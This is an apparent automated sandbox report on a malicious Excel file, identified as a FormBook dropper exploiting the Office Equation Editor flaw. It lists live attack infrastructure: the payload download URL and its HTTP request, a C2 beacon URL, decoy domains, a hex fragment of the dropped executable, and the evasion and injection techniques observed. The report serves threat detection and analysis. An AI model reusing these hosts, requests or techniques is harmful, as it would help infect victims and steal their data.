Windows Analysis Report Sajeeb09908976745344567.xlsx

Overview

General Information

Sample Name: Sajeeb09908976745344567.xlsx
Analysis ID: 502271
MD5: ac493c2681477e3b56acbb570b8e41d9
SHA1: 2d9019b6c2f57c6360b155957cb542ae61bbf728
SHA256: 9efaa722d6e9df7c6628df6d1f49d14d858b60782db11c3f1e9b5037803b290b
Tags: FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.naplesconciergerealty.com/mxnu/"], "decoy": ["insightmyhome.com", "gabriellamaxey.com", "029atk.xyz", "marshconstructions.com", "technichoffghosts.com", "blue-ivy-boutique-au.com", "1sunsetgroup.com", "elfkuhnispb.store", "caoliudh.club", "verifiedpaypal.net", "jellyice-tr.com", "gatescres.com", "bloomberq.online", "crystaltopagent.net", "uggs-line.com", "ecommerceplatform.xyz", "historyofcambridge.com", "sattaking-gaziabad.xyz", "digisor.com", "beachpawsmobilegrooming.com", "whitebot.xyz", "zacky6.online", "qlfa8gzk8f.com", "scottjasonfowler.com", "influxair.com", "desongli.com", "xn--w7uy63f0ne2sj.com", "pinup722bk.com", "haohuatour.com", "dharmathinkural.com", "hanjyu.com", "tbrhc.com", "clarityflux.com", "meltonandcompany.com", "revgeek.com", "onehigh.club", "closetu.com", "yama-nkok.com", "brandonhistoryandinfo.com", "funkidsroomdecor.com", "epilasyonmerkeziankara.com", "265411.com", "watch12.online", "dealsbonaza.com", "gold2guide.art", "tomclark.online", "877961.com", "washingtonboatrentals.com", "promovart.com", "megapollice.online", "taquerialoteria.com", "foxsontreeservice.com", "safebookkeeping.com", "theeducationwheel.online", "sasanos.com", "procurovariedades.com", "normandia.pro", "ingdalynnia.xyz", "campusguideconsulting.com", "ashramseries.com", "clubcupids.art", "mortgagerates.solutions", "deepscanlabs.com", "insulated-box.com"]}
Multi AV Scanner detection for submitted file
Source: Sajeeb09908976745344567.xlsx Virustotal: Detection: 29% Perma Link
Source: Sajeeb09908976745344567.xlsx ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: www.naplesconciergerealty.com/mxnu/ Avira URL Cloud: Label: malware
Source: http://192.3.110.172/000900/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: www.naplesconciergerealty.com/mxnu/ Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 36%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.netsh.exe.6d3da0.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.vbc.exe.3030000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.netsh.exe.2c6796c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405E93 FindFirstFileA,FindClose, 4_2_00405E93
Source: C:\Users\Public\vbc.exe Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_004054BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402671 FindFirstFileA, 4_2_00402671

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.washingtonboatrentals.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 5_2_00406AC1
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_0040C3E7
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00415671
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop ebx 8_2_00086AC1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 8_2_0008C3E7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 8_2_00095671
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.washingtonboatrentals.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.naplesconciergerealty.com/mxnu/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.64.163.50 3.64.163.50
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 17:03:16 GMTServer: Apache/2.4.50 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Wed, 13 Oct 2021 06:08:09 GMTETag: "46f39-5ce35c953b021"Accept-Ranges: bytesContent-Length: 290617Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /000900/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.110.172Connection: Keep-Alive
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.510963296.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.514857516.0000000008118000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/c
Source: explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE98A654.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.washingtonboatrentals.com
Source: global traffic HTTP traffic detected: GET /000900/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.110.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== HTTP/1.1User-Agent: Windows ExplorerHost: www.washingtonboatrentals.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404FC2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 0 " 21 22
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
